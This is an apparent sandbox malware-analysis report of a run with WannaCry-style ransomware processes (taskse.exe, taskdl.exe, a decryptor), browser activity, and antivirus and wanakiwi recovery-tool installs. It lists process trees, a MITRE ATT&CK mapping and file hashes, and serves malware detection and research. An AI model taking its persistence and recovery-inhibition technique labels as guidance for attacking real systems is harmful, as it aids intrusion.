- Executes dropped EXE
PID:5328

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
PID:6472

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6464

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:7220

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
PID:7564

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:7576

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:7604

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
PID:7100

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:8188

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:7128

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\ExitRestart.gif
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:720

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:720 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1268

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:4540

C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
2⤵
- Suspicious use of WriteProcessMemory
PID:4804

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Relaunch /Play C:\Users\Admin\Desktop\EnterWait.wax
3⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1696

C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
2⤵
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\System32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:4728

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2932

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
- Drops file in Windows directory
PID:5060

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2972

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3772

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.0.1993601910\584757806" -parentBuildID 20221007134813 -prefsHandle 1712 -prefMapHandle 1640 -prefsLen 18084 -prefMapSize 231738 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1fbd4fcb-2465-472e-b1bc-dde60d01566e} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 1784 1c980905c58 socket
3⤵
PID:4324

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.1.641957213\1756456338" -parentBuildID 20221007134813 -prefsHandle 2404 -prefMapHandle 2076 -prefsLen 19118 -prefMapSize 231738 -appDir "C:\Program Files\Mozilla Firefox\browser" - {699362c5-f165-4ea0-9dbd-cfa5351650ef} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 2376 1c9ff6ebe58 gpu
3⤵
PID:4776

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.2.1951426933\881271501" -childID 1 -isForBrowser -prefsHandle 3368 -prefMapHandle 3364 -prefsLen 19793 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {310257e1-dd07-45f8-9d29-593a0c65760d} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 3344 1c9817cde58 tab
3⤵
PID:2968

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.3.884492144\1610154312" -childID 2 -isForBrowser -prefsHandle 3728 -prefMapHandle 3724 -prefsLen 19980 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {278cf3e6-adf7-411c-89a7-0e2f6333d7ad} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 3736 1c984abe858 tab
3⤵
PID:704

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.4.1704084025\55090362" -childID 3 -isForBrowser -prefsHandle 4064 -prefMapHandle 3664 -prefsLen 26438 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {41fb7d8c-3704-47c3-a957-9ffdc3b9be88} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 3980 1c982be5558 tab
3⤵
PID:3580

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.5.1905672660\975279116" -parentBuildID 20221007134813 -prefsHandle 4748 -prefMapHandle 4744 -prefsLen 27022 -prefMapSize 231738 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe7da634-78e6-4837-aac5-94d462310606} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 4756 1c9f4769958 rdd
3⤵
PID:2076

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.6.1467778458\1373540260" -childID 4 -isForBrowser -prefsHandle 5136 -prefMapHandle 5148 -prefsLen 27673 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f285981-6b1f-4d91-996a-11b53816e08f} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 5164 1c986e25c58 tab
3⤵
PID:2756

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.7.758309872\724951806" -childID 5 -isForBrowser -prefsHandle 5376 -prefMapHandle 5372 -prefsLen 27673 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c823ad9c-d91e-4da7-b32d-8d5e8f9a737e} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 5388 1c986e25058 tab
3⤵
PID:920

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.8.9086157\263530684" -childID 6 -isForBrowser -prefsHandle 5516 -prefMapHandle 5520 -prefsLen 27673 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {18ca63c7-65ce-4a8d-b86b-e7b82f729c47} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 5508 1c986fd8e58 tab
3⤵
PID:4740

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.9.399012225\1756737608" -childID 7 -isForBrowser -prefsHandle 5900 -prefMapHandle 3544 -prefsLen 27673 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4dc6d81-e741-4865-87b0-b50f0dcce733} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 3388 1c9827e1358 tab
3⤵
PID:5376

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.10.1984914665\578967606" -childID 8 -isForBrowser -prefsHandle 5204 -prefMapHandle 5200 -prefsLen 28178 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1426ba9d-bfe7-490e-bb2a-cc04b45ddcf2} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 5196 1c981974558 tab
3⤵
PID:5780

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.11.940477858\654717800" -childID 9 -isForBrowser -prefsHandle 4516 -prefMapHandle 6092 -prefsLen 28178 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {902fb518-b632-46f6-8390-df5440800ca3} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 4876 1c987996558 tab
3⤵
PID:5868

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.12.1521367334\922728608" -childID 10 -isForBrowser -prefsHandle 2808 -prefMapHandle 2812 -prefsLen 28178 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {924e99df-dace-471c-967a-eaab04f62542} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 4056 1c987998958 tab
3⤵
PID:5920

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.13.2022024939\1027046095" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5824 -prefMapHandle 5816 -prefsLen 28178 -prefMapSize 231738 -appDir "C:\Program Files\Mozilla Firefox\browser" - {00f24b26-dcee-47c3-9f17-70aeee43503f} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 5932 1c987998c58 utility
3⤵
PID:5956

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.14.1670876698\277370313" -childID 11 -isForBrowser -prefsHandle 6356 -prefMapHandle 6360 -prefsLen 28178 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ba37815-0925-4f89-8f64-2a3b3e99bc41} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 6376 1c98296f558 tab
3⤵
PID:3392

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.15.919081634\1896112249" -childID 12 -isForBrowser -prefsHandle 6312 -prefMapHandle 6376 -prefsLen 28178 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c275473-19fb-406d-9514-9203d17829a2} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 6648 1c9894b3f58 tab
3⤵
PID:4124

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.16.1124089391\508427070" -childID 13 -isForBrowser -prefsHandle 6876 -prefMapHandle 6872 -prefsLen 28178 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {239d9f81-df9d-4d96-a8ec-484980dda36f} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 6884 1c9894b4e58 tab
3⤵
PID:3892

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.17.1242231732\1343749902" -childID 14 -isForBrowser -prefsHandle 6772 -prefMapHandle 6648 -prefsLen 28178 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {38a45ff6-0178-4bb5-b385-0413fdd22169} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 6780 1c9894b2a58 tab
3⤵
PID:3952

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.18.1153030079\535111607" -childID 15 -isForBrowser -prefsHandle 5300 -prefMapHandle 5584 -prefsLen 28178 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f94bec0e-eabe-4666-91af-345152c65cce} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 6232 1c982be5258 tab
3⤵
PID:5668

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.19.1192306063\1559166859" -childID 16 -isForBrowser -prefsHandle 6672 -prefMapHandle 6732 -prefsLen 28187 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ff2d291-0b7f-44eb-a8bc-3d777cdc4f41} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 6724 1c989852458 tab
3⤵
PID:5300

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.20.1198030138\433055079" -childID 17 -isForBrowser -prefsHandle 6580 -prefMapHandle 5508 -prefsLen 28227 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {12ca834f-2368-4018-bc1f-eba7331fff3f} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 5532 1c988ed7858 tab
3⤵
PID:4308

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.21.728548041\1440144186" -childID 18 -isForBrowser -prefsHandle 7128 -prefMapHandle 7144 -prefsLen 28227 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f94134f-a6e1-4081-b68b-29f3d921cb0e} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 7116 1c989642858 tab
3⤵
PID:5864

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.22.1242016237\854793721" -childID 19 -isForBrowser -prefsHandle 3632 -prefMapHandle 7304 -prefsLen 28236 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa795e21-11b4-4184-8c9a-a30dd78ca4e7} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 6316 1c986c74658 tab
3⤵
PID:4628

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.23.797776293\738640285" -childID 20 -isForBrowser -prefsHandle 10820 -prefMapHandle 10840 -prefsLen 28236 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a625505f-7d1c-4238-8d31-05b0e11e1a48} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 10860 1c98b414a58 tab
3⤵
PID:5296

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.24.1205349726\2029147468" -childID 21 -isForBrowser -prefsHandle 10840 -prefMapHandle 10788 -prefsLen 28236 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4e571f6-dba3-4dbb-ba34-bdeb92e9764e} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 8696 1c98b68d858 tab
3⤵
PID:1836

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.25.2047844791\1329733552" -childID 22 -isForBrowser -prefsHandle 10504 -prefMapHandle 10500 -prefsLen 28236 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee8ae326-4b4e-4168-9c6a-3f2694920132} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 10516 1c98b68de58 tab
3⤵
PID:5104

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.26.973411965\1842429451" -childID 23 -isForBrowser -prefsHandle 8644 -prefMapHandle 10420 -prefsLen 28236 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de710a0c-f513-4b35-a24b-0972d64a90fc} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 8636 1c98b915c58 tab
3⤵
PID:5992

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3772.27.792800326\1499849752" -childID 24 -isForBrowser -prefsHandle 8492 -prefMapHandle 8496 -prefsLen 28236 -prefMapSize 231738 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {706a143d-be9a-4e52-b0e7-073eb2bd814c} 3772 "\\.\pipe\gecko-crash-server-pipe.3772" 8484 1c98c0f2258 tab
3⤵
PID:5520

C:\Users\Admin\Downloads\avast_one_free_antivirus.exe
"C:\Users\Admin\Downloads\avast_one_free_antivirus.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5444

C:\Users\Admin\Downloads\MBSetup.exe
"C:\Users\Admin\Downloads\MBSetup.exe"
3⤵
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3392

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6112

C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_wanakiwi.zip\wanakiwi.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 412
2⤵
- Program crash
PID:6024

C:\Users\Admin\Downloads\wanakiwi.exe
"C:\Users\Admin\Downloads\wanakiwi.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 424
2⤵
- Program crash
PID:2408

C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies system certificate store
- NTFS ADS
PID:5396

C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe" /installmbtun
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
PID:5392

C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe" /Service /Protected
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
PID:6140

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Checks SCSI registry key(s)
PID:376

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "9" "C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.inf" "9" "4ba9030c7" "0000000000000178" "Service-0x0-3e7$\Default" "000000000000017C" "208" "C:\Program Files\Malwarebytes\Anti-Malware\mbtun"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5740

C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"
1⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies system certificate store
PID:5528

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe" nowindow
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7408

C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
1⤵
- Manipulates Digital Signatures
- Modifies Installed Components in the registry
- Modifies system executable filetype association
- Registers COM server for autorun
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
PID:7472

C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3396" "4840" "9828" "9880" "0" "0" "7532" "7152" "0" "0" "0" "0"
1⤵
PID:7936

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3a83855 /state1:0x41c64e6d
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:6244

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
1⤵
PID:7196

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:704

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Install Root Certificate

T1553.004

Modify Registry

T1112

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Inhibit System Recovery

T1490

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe
Filesize
2.9MB

MD5
46f875f1fe3d6063b390e3a170c90e50

SHA1
62b901749a6e3964040f9af5ddb9a684936f6c30

SHA256
1cf9d3512efffaa2290c105ac8b7534026604067c9b533e7b7df2e017569a4ec

SHA512
fdfb348061158f8133380e9a94215f4bfc0f6ce643a129d623cb8034c49144f1489de56cd076da645478506d9fbddc7590fe3d643622210084b15fdf0d16b557

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
Filesize
288KB

MD5
23f1360ae0e948d300f0f62b53200093

SHA1
e44fd6f0248e0a02525ee67664d83b535d9cb7d3

SHA256
40dfe0689b744e0812ce857f7221ff85431ca37315d9b4f75ca40892af5870da

SHA512
6e34d2546626736aa26b369a86745bdb9816138244fba3d5b5e29de4585cf4e66d52c35b5c5a577f252b62a137e340dd9de36c08a06f5395baec5a726ffb5222

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json
Filesize
621B

MD5
cf4fed24db8d51d71b3703e9a48b000c

SHA1
c9a3a9fc06f26ecbdc4673563c65a021af00513e

SHA256
75af2742660419433603401c201529eabd5cf9fad6a929d8c08b3308b0ae3c2f

SHA512
9843007a659a34d11bc31c400699c9540225ce7dabd270891dd64f406c121ff886b49992bdc340063b3e24592771efc2113039c3dfe6994bf5c0489fc174b64a

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json
Filesize
654B

MD5
503b038ce98e6a4a551e33afeed1cc76

SHA1
184702ea99601c916dedaf1341a66300ee9bb421

SHA256
02312127d941a8c3cf0b0f5911bd485cfdd2214ef5d2beb157dfd7e70156f4af

SHA512
7de2274b0d70552a4db24d1fc2111dc219ced1361e245ed6820882bca9e336674093a83967adc49d566b083b652cb813d6a5f37441ca38031590a588c690521c

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\ctlrvers.dat
Filesize
8B

MD5
dbee8e7bbcba63adfa242c00f228afb0

SHA1
6aae8d9e4053cb52a2f1b6847e65ec6335dbc0fc

SHA256
c01415842abaa4bb6ada941a44c132a4a41c55097fb7e931decd04e8b5d6d380

SHA512
1e82896df024fe6a2390e415bcf8dd92f71125639daebed99e115bd9ac219b5667201d29c6b2390a2fcd505c3780ba112ddfca128137b665da0cfdbd4d63f038

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\mb5uns.exe
Filesize
3.8MB

MD5
d289d84c0406750cef937bdcdbd32740

SHA1
89a8a040a62bc0d2c2809177773f6a10bb83fae9

SHA256
e21d1060a4a2ad8d0cc781d0ec252b497d96915b648fbc9d1ab46ab750c8d00d

SHA512
c8abdac9756ba299ecd3285a134219ccc222acc9f005a71eae85fd815a93b17b8857ac1e446a8122755e8702a39b76c13df962ba79f45855c752e3347311e09b

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\srvversion.dat
Filesize
9B

MD5
5e0e2d584de048ec8e1d96a8402b9074

SHA1
bc939970e17845f19b5487ebc0f1962aa4f5a756

SHA256
2b7b5bc2a6db622fd284281cd712081dc0a8c2650ac55133a96d2a719306f41a

SHA512
8481bc8a5a7188e3d242f426d9daee162ed372101327ef6c452bdabb64cc3b5c38814715705d8341303a3ae1b377e6a0c77b8e0d7258376f563af8f9d21131f9

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\version.dat
Filesize
47B

MD5
c9e644420cd1e20cb526aa7849320134

SHA1
721985eefff89ade252d4687931b4a9c346aeac1

SHA256
55f01dc15a5e79cb8fa79017245392bbbc8edffd03e98d54163ce02a6d645922

SHA512
cb8d959d723467b6e086dd4f119452c5ce6272405978a466e069259fd88137a93c93be96b620a30ed437ff7f86138703b56b1618d701e2c5d7c4bd3385b2b409

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json
Filesize
1KB

MD5
aaf9425328b413cb3e7f7d0fa2891730

SHA1
80712cab60a80d1d11f86814c0e1d7c31918b427

SHA256
4c1a1ba7324f6df282da8304a64645ec3ba762847630ee71b9aec7f0f882ab9d

SHA512
